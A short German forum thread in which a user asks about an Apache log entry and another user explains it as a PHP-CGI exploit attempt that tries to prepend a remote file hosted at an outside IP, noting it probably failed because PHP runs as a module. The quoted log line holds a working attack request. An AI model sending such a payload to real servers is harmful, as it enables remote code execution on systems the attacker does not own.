POST im Apache-Log

[gollum84]

Hallo!

Kann mir jemand sagen, was mir dieser Eintrag in meinem Apache-Log sagen soll?

64.131.64.58 - - [18/Jun/2012:14:51:35 +0200] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.95/icons/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.95/icons/api.gif%20-n HTTP/1.1" 200 216 "-" "Mozilla/5.0"

Danke.

 

[jahlives]

das ist ein POST Request der von der genannten IP an deinen Server geschickt wurde und dein Server hat den Request akzeptiert (Statuscode 200).
Durch allow_url_include und auto_prepend_file wurde versucht Eigenschaften von PHP zu verändern, so dass das remote File (api.gif%20-n) allen PHP Files vorangestellt würde (auto_prepend_file)
imho wird hier geschaut ob PHP im sogenannten cgi-Modus läuft und dann versucht die cgi Lücke auszunutzen. Da aber PHP auf der DS als Modul läuft sollte dies in Leere gelaufen sein

 

[gollum84]

Danke für die schnelle Antwort.

... Da aber PHP auf der DS als Modul läuft sollte dies in Leere gelaufen sein

Falls das doch Erfolg hätte, könnte mir aber ja "nur" die Website beschädigt werden, oder könnte man über den Webserver auch auf die Daten der DS ausserhalb des web-Orders zugreifen?
Habe im Router nur die Ports 80 und 443 weitergeleitet.

 

[jahlives]

die cgi-Lücke kann so ausgenutzt werden, dass man u.U. das System übernehmen (resp einbrechen) könnte. Du siehst ja dass man via URL-Parameter bei der cgi-Lücke auch Configeinstellungen von PHP ändern kann, also kann man auch jede Beschränkung (z.B. openbasedir oder safeMode) aufheben. Aber wie gesagt, das geht nur mit PHP im cgi Modus und nicht mit dem auf der DS eingesetzten Modul-Modus